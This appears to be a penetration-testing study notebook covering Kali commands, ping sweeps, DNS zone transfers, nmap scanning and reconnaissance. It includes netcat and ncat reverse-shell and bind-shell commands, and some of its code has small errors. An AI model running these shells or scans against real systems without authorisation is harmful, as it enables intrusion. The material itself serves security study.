### Kali Quick Commands:
1. best way to nagivate and find files in Kali: __updatedb__ then __locate(filename)__. 
2. __which__ searches through directories defined in PATH environment variable
3. service start: __systemctl start (servicename)__. For example, __systemctl start ssh__. 
4. network service check: __netstat -antp__. For example, check SSH: __netstat -antp | grep sshd__. 
5. service auto start at booting: __systemctl enable (servicename)__.
6. HTTP service: __systemctl start apache2__. 

#### Bash Quick Reference: 
__wget (url)__ can be equally achieve in Python via the __httplib__ module. In bash, the chain of command can be pipelined to parse html page: __wget www.cisco.com__. The html page is by default in index.html, so the command is:<br>
__cat index.html | grep "href=" | cut -d "/" -f 3 | grep "\." | cut -d '"' -f 1 | sort -u__  <br>
This means to get html page from cisco, find all patterns with string "href" and then use "/" as the delimiter, take the 3rd item in the pattern. This should give us
The results are a list of domain names. the __host__ command can be used to discover IP address given domain name: <br> __for url in \$(cat list.txt)\$; do host \$url; done | grep "has address" | cut -d " " -f 4 | sort -u__ 

Another usage for text processing bash could be to check access log:  <br>
__cat access.log | grep \<IP addr\> | cut -d "\"" -f 2 | uniq -c__  <br>
to find the most frequent IP address, or <br>
__cat access.log | grep \<IP addr\> | grep '/admin' | sort -u __<br>
to check the host that tried to access /admin directory. 

In [ ]:
%%bash 
#!/bin/bash 
# ping sweep for IP range: 10.11.1.0/24
for ip in $(seq 1 254); do 
    ping -c 1 10.11.1.$ip | grep "byte from" | cut -d " " -f 4 | cut -d ":" -f 1 &
done 

In [ ]:
# Python multiprocessing 
import multiprocessing 
import subprocess
import os 

def pinger( job_q, results_q): 
    DEVNULL = open(os.devnull, 'w')
    while True:
        ip = job_q.get() 
        if ip is None: break 
        try:
            subprocess.check_all(['ping', '-c1', ip], stdout=DEVNULL)
            results_q.put(ip)
        except:
            pass 

if __name__ == '__main__':
    pool_size = 255
    jobs = multiprocessing.Queue() 
    results = multiprocessing.Queue()
    pool = [ multiprocessing.Process(target=pinger, args=(jobs,results))
             for i in range(pool_size) ]

    for p in pool:
        p.start()

    for i in range(1,255):
        jobs.put('192.168.1.{0}'.format(i))

    for p in pool:
        jobs.put(None)

    for p in pool:
        p.join()

    while not results.empty():
        ip = results.get()
        print(ip)

### Essential Command line tools 
#### Netcat:
* check if the port is open on IP: __nc -nv (IP_addr) (portno)__
The command will open a connection to the remote IP
* listening on port: __nc -nlvp (portno)__ This will serve as a server. Usually used together with first command 
* Transfering files:  Receiver: __nc -nlvp 4444 > incoming.exe__ . Redirect all inputs to a file called _incoming.exe_. sender: __nc -nv (target_ip) 4444 < (path_to_file).__ The file transfer process is at background and blocking.
* __Bindshell__: scenario: Bob requests Alice to use cmd.exe on his local machine. Bob: __nc -nlvp 4444 -e cmd.exe__. Alice: __nc -nv (Bob's IP) 4444__. This scenario is used because Alice is behind NAT and cannot receive connection from Bob.           
* Get IP on a host: __ifconfig (network card) | grep inet__.
* __Reverse Shell__: Bob requests Alice to send him a command shell. Bob: __nc -nlvp 4444__. Alice: __nc -nv (Bob's IP) 4444 -e /bin/bash__. This is used because Alice cannot forward traffic from the router to her internal machines, so Bob cannot directly get to her. Instead, she must send traffic to Bob. 

#### Ncat 
* Whereas Netcat does not support encryption, Ncat does. Which could aid bypass firewall and intrusion detection.
* __Bindshell__: Bob: __ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl__. This creates a more secure bind shell from Bob's machine that uses ssl. It would also only accept Alice's connection, given by IP 10.0.0.4. Alice would do: __ncat -v 10.0.0.22 4444 --ssl__ and directly connect to Bob, using also ssl.
* __Reverse Shell__: Bob: __ncat --allow 10.0.0.4 -vnl 4444 --ssl__. Alice: __ncat --exec cmd.exe -v 10.0.0.22 4444 --ssl__. 

#### Tcpdump 
* Used to dump .pcap files captured, or conduct real time packet sniffing on network device. __tcpdump -r passwd.pcap__
* Able to be used directly with shell script for document parsing and filtering. __tcpdump -n -r password_cracking_filtered.pcap | cut -d " " -f 3 | sort -u | head__
* Flexible options for src, dst, port. __tcpdump -n src host (IP) -r (file)__. __tcpdump -n dst host (IP) -r (file)__ and __tcpdump -n port (portno) -r (file)__.
* Dump packet in hex format: __tcpdump -nX -r (file.pcap)__ 
* __Advanced Header Filtering__: ![tcp](tcp-hdr.png)For example, to filter only packets that have PSH and ACK flas turned on, deal with the 14th byte of the TCP header. The flags are CEU__AP__RSF on the top, with AP for PSH and ACK, set to one, and all others zero. This gives 00011000, or 24 in decimal. This gives command: __tcpdump -A -n 'tcp[13] = 24' -r passwd.pcap__


## GUI tools 

### Passive Information Gathering 
normally involves __Google Hacking__ and command line tools for Domain name discovery. 
* For example. __site:microsoft.com__ only gives sites with parent domain name microsoft
* __filetype, inurl, intitle__ can also be used. For example, __intitle:"netbotz appliance" "OK" -filetype: pdf__ gives vulnerable netbotz camera sites. 
* More information about Google hacking can be found on __[exploit-db](https://www.exploit-db.com/google-hacking-database/)__
* __Email Harvesting__: Kali specific tool: __theharvester -d cisco.com -b google > google.txt__  searches on Google for email address cisco.com.
* __Whois__: __whois (domainname)__ can be used to do a basic reconnaisance of the target organization. It can also do a reverse lookup with __whois (IP)__.
* __Recon-ng__ is a web reconnaissance framework written in Python. More detail can be found on __[Using Python to spy on your friends](https://www.youtube.com/watch?v=qkUIgl9ASGw)__

### Active Information Gathering
Active Info gathering normally includes __DNS Enumeration, Port Scanning, SMB Enumeration, SMTP, SNMP Enumeration__. 
DNS server interaction: 
* DNS Enumeration: 
    * host command: __host -t ns (domain)__ for ns record and __host -t mx (domain)__ for mail server. One can always use a Brute force guess on domain name and use host to get information. __for ip in \$(seq
155 190);do host 50.7.67.$ip;done |grep -v "not found"__

* __DNS Zone Transfer__: similar to a database replication act between related DNS servers. zone file contains a list of all DNS names configured for that zone. Zone can only be copied from parent to child. DNS transfer are supposed to be limited to authorized child servers, but can be misconfigured. 
    * __host -l (domain name) (dns server address)__ performs a zone transfer. If a zone transfer is successful, a full list of zone files will be dumped. candidate name servers could be: __host -t ns (domain name) | cut -d " " f 4__.

In [ ]:
%%bash 
#!/bin/bash 
# automatic zone transfer 
if [ -z "$1" ]; then 
echo "zone transfer usage: $0 <domain name>"
exit 0
fi 

for server in $(host -t ns $1 | cut -d" " -f 4); do 
# for each name server, attempt a zone transfer 
host -l $1 $server | grep "has address" 
done 

Automatic tools on Kali to deal with DNS enumeartion includes: __[DNSRecon](https://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/)__ and __[DNSenum](http://kalilinuxtutorials.com/dnsenum/)__

#### Port Scanning 
port scanning is the process of checking for open TCP and UDP ports on a remote machine. 
* TCP SYN scanning: use the threeway handshake to determine if port is open, using netcat __nc -nvv -w 1 -z (target ip) (target port range)__
* Stealth scan: without completing a TCP handshake, with only SYN packet. if port is open, SYN-ACK should be received. This can deal firewall logging better, which normally deals with complete TCP sessions. But modern firewalls solved it.
* UDP scanning: __nc -nv -u -z -w 1 10.0.0.19 160-162__. If UDP port is open, no reply is sent back; if UDP port is closed, ICMP port unreachable is replied.
    * UDP port scanning is unreliable, since firewalls often drop ICMP, resulting to false positives. 
* Most port scanners scan only the popular ports 
* __Nmap Port scan__: default nmap TCP scan scans the 1000 most popular ports on a given machine, and it generates great amount of network traffic. __nmap -sT -p 1-65535 10.0.0.19__
    * Network sweeping: __nmap -sn 10.11.1.1-254__ (ping sweep). 
    * __nmap -v -sn 10.11.1.1-254 -oG ping-sweep.txt__ records all online hosts 
    * __grep Up ping-sweep.txt | cut -d " " -f  2__
    * Port sweeping: __nmap -p 80 10.11.1.1-254 -oG web-sweep.txt__
    * __grep open web-sweep.txt | cut -d " " -f 2__ 
    * scan top 20 TCP ports: __nmap -sT -A --top-ports=20 10.11.1.1.-254 -oG top-port-sweep.txt__ 
    * OS Fingerprinting: __nmap -O 10.0.0.19__ grabs informatin about the OS for target 
    * Banner Grabbing: __nmap -sV -sT 10.0.0.19__ gives open port and their corresponding services 
    * 